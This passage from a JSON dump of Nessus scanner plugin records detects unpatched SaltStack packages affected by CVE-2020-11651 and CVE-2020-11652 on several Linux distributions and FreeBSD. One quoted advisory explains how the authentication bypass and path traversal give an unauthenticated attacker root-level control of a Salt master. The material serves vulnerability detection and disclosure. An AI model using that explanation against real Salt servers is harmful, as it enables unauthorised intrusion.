(rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T01:12:34", "description": "An update of the salt3 package has been released.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-18T00:00:00", "title": "Photon OS 1.0: Salt3 PHSA-2020-1.0-0294", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-18T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136695", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136695);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-api-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-cloud-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-master-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-minion-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-proxy-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-spm-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-ssh-2019.2.4-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt3-syndic-2019.2.4-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T07:13:33", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-30T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-04-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-1150-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136169", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1150-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136169);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11652/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201150-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?85e05fec\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Server-Applications-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Python2-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-SP1-2020-1150=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T04:58:41", "description": "This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.", "edition": 6, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-04T00:00:00", "title": "openSUSE Security Update : salt (openSUSE-2020-564)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-04T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-master", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:python3-salt"], "id": "OPENSUSE-2020-564.NASL", "href": "https://www.tenable.com/plugins/nessus/136306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136306);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-564)\");\n script_summary(english:\"Check for the openSUSE-2020-564 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-2019.2.0-lp151.5.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T02:55:39", "description": "F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the 'root key' used to authenticate commands from the local\nroot user on the master server. This 'root key' can then be used to\nremotely call administrative commands on the master server. This\nunintentional exposure provides a remote un-authenticated attacker\nwith root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module\ncontains commands used to read and write files under specific\ndirectory paths. The inputs to these functions are concatenated with\nthe target directory and the resulting path is not canonicalized,\nleading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is\nexposed to unauthenticated requests by the ClearFuncs class) fails to\nsanitize the token input parameter which is then used as a filename,\nallowing insertion of '..' path elements and thus reading of files\noutside of the intended directory. The only restriction is that the\nfile has to be deserializable by salt.payload.Serial.loads().", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-18T00:00:00", "title": "FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py35-salt", "p-cpe:/a:freebsd:freebsd:py38-salt", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:py36-salt", "p-cpe:/a:freebsd:freebsd:py37-salt", "p-cpe:/a:freebsd:freebsd:py34-salt", "p-cpe:/a:freebsd:freebsd:py27-salt", "p-cpe:/a:freebsd:freebsd:py32-salt", "p-cpe:/a:freebsd:freebsd:py33-salt"], "id": "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL", "href": "https://www.tenable.com/plugins/nessus/136687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE 